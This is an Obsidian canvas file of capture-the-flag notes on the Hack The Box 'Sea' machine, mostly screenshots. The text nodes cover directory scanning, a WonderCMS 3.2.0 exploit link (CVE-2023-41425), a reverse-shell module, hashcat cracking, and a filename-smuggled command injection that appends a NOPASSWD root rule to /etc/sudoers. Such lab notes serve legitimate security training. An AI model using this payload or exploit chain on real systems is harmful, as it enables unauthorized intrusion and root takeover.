{
	"nodes":[
		{"id":"fb6b1e0f836334d8","type":"text","text":"http://sea.htb/loginURL","x":584,"y":2270,"width":250,"height":150},
		{"id":"49325e68df7bb59a","type":"file","file":"sea/attachments/Pasted image 20250120141746.png","x":-280,"y":-180,"width":399,"height":269},
		{"id":"7073471b1421d3cb","type":"text","text":"phpsessid","x":-273,"y":-298,"width":250,"height":60},
		{"id":"f87e3671d080a9c1","type":"text","text":"feroxbuster","x":-205,"y":140,"width":250,"height":60},
		{"id":"e1dbd4eb7d1251df","type":"file","file":"sea/attachments/Pasted image 20250120143131.png","x":-367,"y":260,"width":575,"height":50},
		{"id":"729cfa40b9f30a8e","type":"file","file":"sea/attachments/Pasted image 20250120143258.png","x":-205,"y":380,"width":400,"height":221},
		{"id":"1da768e34fe14370","type":"file","file":"sea/attachments/Pasted image 20250120143308.png","x":-660,"y":454,"width":398,"height":74},
		{"id":"37325e88f48a39c5","type":"file","file":"sea/attachments/Pasted image 20250120143319.png","x":280,"y":456,"width":398,"height":70},
		{"id":"7ae3d17320e551db","type":"text","text":"what is the web server running? some type of CMS?","x":-255,"y":640,"width":450,"height":83},
		{"id":"db2e6265d7997675","type":"file","file":"sea/attachments/Pasted image 20250120143432.png","x":-205,"y":820,"width":400,"height":86},
		{"id":"93b8fb97a85d9296","type":"file","file":"sea/attachments/Pasted image 20250120143849.png","x":-205,"y":1040,"width":400,"height":97},
		{"id":"5bd484d31e22f307","type":"text","text":"https://github.com/WonderCMS/wondercms-cdn-files/blob/main/wcms-modules.json","x":260,"y":1059,"width":360,"height":78},
		{"id":"81f96cc715b8cadf","type":"text","text":"wonder cms 3.2.0","x":-330,"y":1200,"width":250,"height":60},
		{"id":"268c0358d66a020e","type":"file","file":"sea/attachments/Pasted image 20250120151706.png","x":-405,"y":1640,"width":400,"height":251},
		{"id":"19041b587af82c6c","type":"file","file":"sea/attachments/Pasted image 20250120151726.png","x":60,"y":1705,"width":400,"height":122},
		{"id":"db1860d0067635d8","type":"text","text":"https://github.com/prodigiousMind/CVE-2023-41425","x":-276,"y":2000,"width":471,"height":50},
		{"id":"1cd03cfdc2fb3be0","type":"text","text":"craft a payload and send it as url and the victim will \"click\" on it","x":576,"y":1734,"width":304,"height":93},
		{"id":"8daa0255397fff48","type":"text","text":"Wonder CMS 3.2.0","x":-580,"y":1995,"width":250,"height":60},
		{"id":"f35eca26cffe1a48","type":"file","file":"sea/attachments/Pasted image 20250120151906.png","x":-440,"y":2240,"width":398,"height":80},
		{"id":"71f3ce1d3b5e45fd","type":"file","file":"sea/attachments/Pasted image 20250120151937.png","x":120,"y":2192,"width":400,"height":257},
		{"id":"54f5e5a4920cfacc","type":"file","file":"sea/attachments/Pasted image 20250120152134.png","x":120,"y":2600,"width":400,"height":229},
		{"id":"6f52bec07eb40917","type":"text","text":"installing a revshell module","x":600,"y":2662,"width":250,"height":60},
		{"id":"cbcf35667013a5ff","type":"text","text":"running the reverse shell with our lhost and lport","x":584,"y":2977,"width":250,"height":60},
		{"id":"cf38930089b63f95","type":"file","file":"sea/attachments/Pasted image 20250120152317.png","x":120,"y":2988,"width":397,"height":39},
		{"id":"cf7d7320fd431faa","type":"file","file":"sea/attachments/Pasted image 20250120152456.png","x":120,"y":3160,"width":400,"height":94},
		{"id":"555adfd2e1c5c03b","type":"text","text":"exploit create a link that we need to enter in the website field in contact.php ","x":576,"y":3177,"width":504,"height":77},
		{"id":"4c1a794f33d04315","type":"text","text":"https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip","x":920,"y":2662,"width":628,"height":52},
		{"id":"e640515e117c00b1","type":"file","file":"sea/attachments/Pasted image 20250120152643.png","x":-80,"y":3440,"width":400,"height":210},
		{"id":"c6b4387284b8f058","type":"file","file":"sea/attachments/Pasted image 20250120153426.png","x":680,"y":4480,"width":400,"height":365},
		{"id":"8b674b3901db6edc","type":"file","file":"sea/attachments/Pasted image 20250120153447.png","x":-310,"y":4497,"width":886,"height":332},
		{"id":"47b60299a1e4b002","type":"file","file":"sea/attachments/Pasted image 20250120154224.png","x":-90,"y":3760,"width":846,"height":80},
		{"id":"546ae966ba724a7e","type":"file","file":"sea/attachments/Pasted image 20250120154156.png","x":-90,"y":3960,"width":400,"height":184},
		{"id":"efa58d7c0b757feb","type":"file","file":"sea/attachments/Pasted image 20250120160041.png","x":-56,"y":5080,"width":632,"height":360},
		{"id":"64c4318e5fb48472","type":"file","file":"sea/attachments/Pasted image 20250120160105.png","x":60,"y":5600,"width":400,"height":136},
		{"id":"fef4b1f40711f02f","type":"file","file":"sea/attachments/Pasted image 20250120160212.png","x":-67,"y":5800,"width":643,"height":389},
		{"id":"824ad9f47d718602","type":"file","file":"sea/attachments/Pasted image 20250120160453.png","x":-280,"y":6480,"width":1210,"height":480},
		{"id":"be45c80ae7f3a31f","type":"text","text":"save hash without backslashes","x":160,"y":7000,"width":250,"height":60},
		{"id":"994243eeb8ab6a6e","type":"file","file":"sea/attachments/Pasted image 20250120160758.png","x":-312,"y":7200,"width":1195,"height":200},
		{"id":"4364c9f32b9aaca5","type":"file","file":"sea/attachments/Pasted image 20250120160843.png","x":-240,"y":7540,"width":921,"height":140},
		{"id":"0c3812d34fea2097","type":"text","text":"https://hashcat.net/wiki/doku.php?id=example_hashes","x":798,"y":7553,"width":250,"height":60},
		{"id":"5d6cfa733ce44f3f","type":"text","text":"└─$ hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt \n","x":-193,"y":7791,"width":813,"height":69},
		{"id":"d9c4c23be37741ce","type":"file","file":"sea/attachments/Pasted image 20250120161115.png","x":-139,"y":7940,"width":705,"height":450},
		{"id":"a7683ce2aff17f5d","type":"file","file":"sea/attachments/Pasted image 20250120161333.png","x":14,"y":8560,"width":399,"height":177},
		{"id":"357542dafb3b98ac","type":"file","file":"sea/attachments/Pasted image 20250120162226.png","x":-20,"y":9160,"width":400,"height":172},
		{"id":"53c943aed1500ccb","type":"file","file":"sea/attachments/Pasted image 20250120164007.png","x":-20,"y":9420,"width":400,"height":257},
		{"id":"01d0d27c0515b779","type":"file","file":"sea/attachments/Pasted image 20250120164043.png","x":-20,"y":9780,"width":399,"height":201},
		{"id":"cf189b9d74d05c0f","type":"file","file":"sea/attachments/Pasted image 20250120164251.png","x":-20,"y":10060,"width":400,"height":250},
		{"id":"fa6d5833e9ffb3ce","type":"file","file":"sea/attachments/Pasted image 20250120164229.png","x":-20,"y":10420,"width":399,"height":176},
		{"id":"c50cf4ea173410b3","type":"text","text":"we can modify the filename","x":428,"y":10473,"width":250,"height":60},
		{"id":"d5a34acf332145dd","type":"file","file":"sea/attachments/Pasted image 20250120164627.png","x":-20,"y":10680,"width":400,"height":297},
		{"id":"91bef8f0c909901d","type":"file","file":"sea/attachments/Pasted image 20250120164945.png","x":-20,"y":11040,"width":400,"height":263},
		{"id":"d6e1784b9b830b6a","type":"file","file":"sea/attachments/Pasted image 20250120165523.png","x":-20,"y":11360,"width":399,"height":135},
		{"id":"764244e1091ef443","type":"file","file":"sea/attachments/Pasted image 20250120165556.png","x":-20,"y":11540,"width":399,"height":261},
		{"id":"7191b8c2b92ba198","type":"file","file":"sea/attachments/Pasted image 20250120165438.png","x":-20,"y":11840,"width":399,"height":128},
		{"id":"db6e7fdf0a135010","type":"file","file":"sea/attachments/Pasted image 20250120161433.png","x":-20,"y":8880,"width":399,"height":104},
		{"id":"31d463847b533e9c","type":"text","text":"└─$ gobuster dir -u http://sea.htb -x php --wordlist=/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster_web -t 1000\n","x":898,"y":200,"width":825,"height":50},
		{"id":"16f2fd1ec00870de","type":"file","file":"sea/attachments/Pasted image 20250120145902.png","x":478,"y":190,"width":400,"height":111},
		{"id":"0331b2338bdeee39","type":"text","text":"/etc/passwd+%26%26+echo%20'amay%20ALL=(root)%20NOPASSWD:%20ALL'%20%3E%3E%20/etc/sudoers+#","x":480,"y":11600,"width":740,"height":109}
	],
	"edges":[]
}